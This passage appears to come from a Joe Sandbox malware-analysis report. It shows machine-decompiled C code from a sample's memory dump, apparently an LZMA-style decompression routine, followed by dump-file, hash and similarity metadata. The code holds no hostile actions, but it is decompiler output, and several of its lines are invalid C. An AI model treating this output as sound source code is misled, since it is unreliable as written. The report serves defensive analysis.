											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406398, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
